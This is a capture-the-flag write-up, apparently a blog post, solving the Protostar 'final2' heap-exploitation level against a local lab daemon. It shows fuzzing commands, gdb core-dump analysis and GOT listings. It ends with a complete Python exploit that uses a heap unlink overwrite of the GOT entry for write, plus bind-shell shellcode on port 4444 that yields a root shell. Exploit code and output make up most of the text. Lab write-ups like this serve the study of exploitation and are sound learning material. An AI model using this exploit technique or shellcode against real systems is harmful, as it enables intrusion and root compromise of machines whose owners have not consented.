This is the last level of the Protostar series. (link)
Source Code:
It took me a while just to find the vulnerability here. There's not a description of what the code is doing, so it took some time just to understand what was going on.
One thing that still doesn't make sense is that the destroylist array is never set to anything before it's used in the free call on line 57. You can see buf is set to the return address of calloc on line 45, but it's destroylist that is freed, not buf!
I kept going, assuming a "destroylist[dll] = buf" line was left out somewhere...
I started out by messing around to see if I could cause a crash or hang somewhere:
$ python -c "print 'FSRD' + 'x'*118 + '/ROOT/'" | nc 127.0.0.1 2993
Process OK
Process OK
$ python -c "print 'FSRD' + 'x'*116 + '/ROOT/'" | nc 127.0.0.1 2993
Process OK
$ python -c "print 'FSRD' + 'x'*117 + '/ROOT/'" | nc 127.0.0.1 2993
^C (hangs)
$ python -c "print '/'*128 + 'FSRD' + 'x'*117 + '/ROOT/'" | nc 127.0.0.1 2993
Process OK
Why doesn't this trigger the printf statement? oh... "Process OK" is coming from a write call... printf is going somewhere else...
Eventually I got it to crash and leave a coredump in /tmp/ with the following input:
$ python -c "print 'FSRD' + 'a'*124 + 'FSRD' + 'x'*117 + '/ROOT/'" | nc 127.0.0.1 2993
Loading the coredump:
root@protostar:/tmp# gdb /opt/protostar/bin/final2 core.11.final2.1919
GNU gdb (GDB) 7.0.1-debian
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /opt/protostar/bin/final2...done.
warning: Can't read pathname for load map: Input/output error.
Reading symbols from /lib/libc.so.6...Reading symbols from /usr/lib/debug/lib/libc-2.11.2.so...done.
(no debugging symbols found)...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...Reading symbols from /usr/lib/debug/lib/ld-2.11.2.so...done.
(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
Core was generated by `/opt/protostar/bin/final2'.
Program terminated with signal 11, Segmentation fault.
#0 strlen () at ../sysdeps/i386/i486/strlen.S:69
69 ../sysdeps/i386/i486/strlen.S: No such file or directory.
in ../sysdeps/i386/i486/strlen.S
(gdb) i r
eax 0x0 0
ecx 0x0 0
edx 0x0 0
ebx 0xb7fd7ff4 -1208123404
esp 0xbffff7fc 0xbffff7fc
ebp 0xbffff828 0xbffff828
esi 0x0 0
edi 0x0 0
eip 0xb7f0a313 0xb7f0a313 <strlen+51>
eflags 0x10246 [ PF ZF IF RF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
Unfortunately, this seems to be crashing during the strlen call...
Since we know this is a heap vulnerability, it would be good if we could get it to crash during the free call, which should give us the ability to eventually work it into an arbitrary write using the something like the 'unlink' trick from the earlier heap levels.
Now let's try something like this:
# python -c "print 'FSRD' + 'a'*123 + '/' + 'FSRD' + 'ROOT' + '/' + 'a'*119" | nc 127.0.0.1 2993
Process OK
a coredump is made:
root@protostar:/tmp# gdb /opt/protostar/bin/final2 core.11.final2.2065
...
Program terminated with signal 11, Segmentation fault.
#0 0x0804aabf in free (mem=0x804e008) at final2/../common/malloc.c:3643
Nice!
Ok, so we're now failing in the call to free.
Now we just have to work it into something that will let us write to an arbitrary address.
Let's first find what object in the GOT we'll try to overwrite....
root@protostar:/tmp# objdump -R /opt/protostar/bin/final2
DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
0804d3d8 R_386_GLOB_DAT __gmon_start__
0804d4c0 R_386_COPY stderr
0804d4c4 R_386_COPY __environ
0804d4c8 R_386_COPY stdin
0804d4e0 R_386_COPY stdout
0804d3e8 R_386_JUMP_SLOT __errno_location
0804d3ec R_386_JUMP_SLOT srand
0804d3f0 R_386_JUMP_SLOT open
0804d3f4 R_386_JUMP_SLOT mmap
0804d3f8 R_386_JUMP_SLOT setgroups
0804d3fc R_386_JUMP_SLOT getpid
0804d400 R_386_JUMP_SLOT strerror
0804d404 R_386_JUMP_SLOT daemon
0804d408 R_386_JUMP_SLOT sysconf
0804d40c R_386_JUMP_SLOT err
0804d410 R_386_JUMP_SLOT signal
0804d414 R_386_JUMP_SLOT __gmon_start__
0804d418 R_386_JUMP_SLOT mremap
0804d41c R_386_JUMP_SLOT write
0804d420 R_386_JUMP_SLOT listen
0804d424 R_386_JUMP_SLOT memset
0804d428 R_386_JUMP_SLOT __libc_start_main
0804d42c R_386_JUMP_SLOT wait
0804d430 R_386_JUMP_SLOT htons
0804d434 R_386_JUMP_SLOT read
0804d438 R_386_JUMP_SLOT setresuid
0804d43c R_386_JUMP_SLOT setresgid
0804d440 R_386_JUMP_SLOT sbrk
0804d444 R_386_JUMP_SLOT accept
0804d448 R_386_JUMP_SLOT socket
0804d44c R_386_JUMP_SLOT dup2
0804d450 R_386_JUMP_SLOT memcpy
0804d454 R_386_JUMP_SLOT strlen
0804d458 R_386_JUMP_SLOT asprintf
0804d45c R_386_JUMP_SLOT printf
0804d460 R_386_JUMP_SLOT bind
0804d464 R_386_JUMP_SLOT close
0804d468 R_386_JUMP_SLOT fwrite
0804d46c R_386_JUMP_SLOT fprintf
0804d470 R_386_JUMP_SLOT strstr
0804d474 R_386_JUMP_SLOT setvbuf
0804d478 R_386_JUMP_SLOT execve
0804d47c R_386_JUMP_SLOT rindex
0804d480 R_386_JUMP_SLOT memmove
0804d484 R_386_JUMP_SLOT fork
0804d488 R_386_JUMP_SLOT setsockopt
0804d48c R_386_JUMP_SLOT rand
0804d490 R_386_JUMP_SLOT htonl
0804d494 R_386_JUMP_SLOT strncmp
0804d498 R_386_JUMP_SLOT munmap
0804d49c R_386_JUMP_SLOT snprintf
0804d4a0 R_386_JUMP_SLOT strcmp
0804d4a4 R_386_JUMP_SLOT exit
We know write will get called after the first free call... what if we try that?
root@protostar:/tmp# objdump -R /opt/protostar/bin/final2 | grep "write"
0804d41c R_386_JUMP_SLOT write
0804d468 R_386_JUMP_SLOT fwrite
Let's first go back and take the code from the 3rd heap level (http://secwriteups.blogspot.com/2014/12/protostar-heap-3.html).
**DON'T FORGET YOU NEED TO DEAL WITH NETWORK BYTE ORDER NOW!**
root@protostar:/tmp# python -c "print 'FSRD' + 'a'*123 + '/' + 'FSRD' + 'ROOT' + '/' + '\xf0\xff\xff\xff\xfc\xff\xff\xff'+ 'b'*111" | nc 127.0.0.1 2993
Process OK
root@protostar:/tmp# gdb /opt/protostar/bin/final2 core.11.final2.2205
...
Program terminated with signal 11, Segmentation fault.
Program terminated with signal 11, Segmentation fault.
#0 0x0804aaef in free (mem=0x804e008)
(gdb) x/i $eip
0x804aaef <free+301>: mov %edx,0xc(%eax)
(gdb) i r
eax 0x62626262 1650614882
ecx 0x804c2d6 134529750
edx 0x62626262 1650614882
ebx 0xb7fd7ff4 -1208123404
esp 0xbffff7e0 0xbffff7e0
ebp 0xbffff828 0xbffff828
esi 0x0 0
edi 0x0 0
eip 0x804aaef 0x804aaef <free+301>
eflags 0x10246 [ PF ZF IF RF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
Looks like we have an arbitrary write!! (with a +0xc offset in the value we will be writing)
let's make sure we control the to/from addresses:
root@protostar:/tmp# python -c "print 'FSRD' + 'a'*123 + '/' + 'FSRD' + 'ROOT' + '/' + '\xf0\xff\xff\xff\xfc\xff\xff\xff'+ 'a'*4 + 'b'*4 + 'c'*108" | nc 127.0.0.1 2993
Process OK
root@protostar:/tmp# gdb /opt/protostar/bin/final2 core.11.final2.2238
...
Program terminated with signal 11, Segmentation fault.
#0 0x0804aaef in free (mem=0x804e008) at final2/../common/malloc.c:3648
...
(gdb) x/i $eip
0x804aaef <free+301>: mov %edx,0xc(%eax)
(gdb) i r
eax 0x61616161 1633771873
ecx 0x804c2d6 134529750
edx 0x62626262 1650614882
ebx 0xb7fd7ff4 -1208123404
esp 0xbffff7e0 0xbffff7e0
ebp 0xbffff828 0xbffff828
esi 0x0 0
edi 0x0 0
eip 0x804aaef 0x804aaef <free+301>
eflags 0x10246 [ PF ZF IF RF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
This looks pretty good!
using the write address from the GOT (0x0804d41c) and subtracting 0xc from it gives the target address 0x0804d410.
root@protostar:/tmp# python -c "print 'FSRD' + 'a'*123 + '/' + 'FSRD' + 'ROOT' + '/' + '\xf0\xff\xff\xff\xfc\xff\xff\xff'+ '\x1c\xd4\x04\x08' + 'aaaa' + 'c'*108" | nc 127.0.0.1 2993
Process OK
root@protostar:/tmp# gdb /opt/protostar/bin/final2 ./core.11.final2.2296
...
Program terminated with signal 11, Segmentation fault.
#0 0x0804aaf8 in free (mem=0x804e008) at final2/../common/malloc.c:3648
(gdb) x/10x 0x804d41c
0x804d41c <_GLOBAL_OFFSET_TABLE_+64>: 0xb7f53c70 0xb7f63a60 0xb7f0bc60 0x61616161
0x804d42c <_GLOBAL_OFFSET_TABLE_+80>: 0xb7f2d890 0xb7f78be0 0xb7f53c00 0xb7f2efc0
0x804d43c <_GLOBAL_OFFSET_TABLE_+96>: 0xb7f2f040 0xb7f5ab20
If instead we use 0xfffffffe and 0xfffffffc, we'll be able to get a similar arbitrary write without the previous crash.
The final solution:
#!/usr/bin/env python
#
import socket
HOST = "127.0.0.1"
PORT = 2993
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
shellcode = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80" \
"\x5b\x5e\x52\x68\xff\x02\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a" \
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0" \
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f" \
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0" \
"\x0b\xcd\x80"
hdr = "\xfe\xff\xff\xff" + "\xfc\xff\xff\xff" + "\x10\xd4\x04\x08" + "\x18\xe1\x04\x08"
s.sendall("FSRD" + 'a'*123 + "/")
s.sendall("FSRD" + "ROOT" + 'b'*(119-len(hdr)) + "/" + hdr)
s.sendall('c'*(128-len(shellcode)) + shellcode)
print s.recv(1024)
print s.recv(1024)
s.close()
Running it looks like this:
root@protostar:/tmp# python final2.py
Process OK
(hangs)
user@protostar:~$ nc 127.0.0.1 4444
whoami (<-- typed by me)
root
